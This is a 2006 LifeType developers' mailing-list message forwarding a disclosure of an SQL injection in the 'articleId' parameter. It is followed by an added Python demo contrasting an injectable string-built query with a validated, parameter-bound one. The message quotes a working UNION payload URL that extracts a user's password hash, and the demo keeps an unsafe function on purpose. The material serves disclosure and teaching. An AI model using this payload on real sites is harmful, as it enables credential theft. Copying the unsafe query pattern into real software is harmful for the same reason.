[pLog-svn] Fwd: LifeType <= 1.0.4 'articleId' SQL injection

Oscar Renalias oscar at renalias.net
Sat Jun 3 21:45:04 GMT 2006


I couldn't get the linked script to work, but this is the interesting  
part of it:

http://www.yourhost.com/lifetype-1.0.4/index.php? 
op=ViewArticle&blogId=1&articleId=9999/**/UNION/**/SELECT/**/password, 
1,1,1,1,1,1,1/**/FROM/**/lt_users/**/WHERE/**/id=1/*

Clever.

On 4 Jun 2006, at 00:43, Oscar Renalias wrote:

> Whoops. Our first serious SQL injection issue!
>
> Begin forwarded message:
>
>> From: "rgod" <zerokool_556 at hotmail.com>
>> Date: 4 June 2006 00:30:31 GMT+03:00
>> To: <contact at lifetype.net>
>> Subject: LifeType <= 1.0.4 'articleId' SQL injection
>>
>> http://retrogod.altervista.org/lifetype_104_sql.html
>>
>> rgod
>>
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
>
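An added example, not part of the original message and not LifeType's own code: the `articleId` value from the URL quoted above, run against a query built by string formatting and against one that validates the id as an integer and binds it. It uses Python with an in-memory SQLite database so it runs offline; the schema, the eight-column layout and all function names are assumptions, and only the `lt_users` table name and the parameter value come from the message.

```python
import sqlite3

# Value of the articleId parameter, copied from the URL quoted in the message.
PAYLOAD = ("9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1"
           "/**/FROM/**/lt_users/**/WHERE/**/id=1/*")

# Assumed: the article query returns eight columns, matching the UNION above.
COLS = "id, blog_id, c3, c4, c5, c6, c7, c8"


def make_db():
    """Constructed in-memory schema and rows; not LifeType's real tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE lt_users (id INTEGER PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO lt_users VALUES (1, 'constructed-hash')")
    db.execute(f"CREATE TABLE lt_articles ({COLS})")
    db.execute("INSERT INTO lt_articles VALUES (7, 1, 'title', 0, 0, 0, 0, 0)")
    return db


def view_article_unsafe(db, blog_id, article_id):
    """Assumed pre-fix pattern: the request value is pasted into the SQL text,
    so it can change the structure of the statement."""
    sql = (f"SELECT {COLS} FROM lt_articles "
           f"WHERE id = {article_id} AND blog_id = {blog_id}")
    return db.execute(sql).fetchall()


def parse_id(raw):
    """Accept only a plain decimal integer; reject everything else."""
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return int(raw)


def view_article_safe(db, blog_id, article_id):
    """Validate the type first, then bind the values as parameters so they
    are only ever treated as data."""
    sql = f"SELECT {COLS} FROM lt_articles WHERE id = ? AND blog_id = ?"
    args = (parse_id(article_id), parse_id(blog_id))
    return db.execute(sql, args).fetchall()
```

With the constructed data, the unsafe version returns the row from `lt_users` for the quoted value, while the safe version raises `ValueError` before any SQL runs and still serves a normal numeric id.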


